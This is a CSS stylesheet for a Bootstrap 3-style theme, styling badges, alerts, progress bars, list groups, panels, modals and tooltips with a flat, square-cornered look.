.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-right: 20px;
  padding-left: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-right: 80px;
    padding-left: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-right: auto;
  margin-left: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #0077bb;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #0077bb;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  padding-left: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #88d4ff;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: left;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-right: 15px;
  padding-left: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1;
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-right-radius: -1;
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #0077bb;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #0077bb;
}
.panel-primary > .panel-heading .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #0077bb;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-left: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-left: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-left: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  right: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
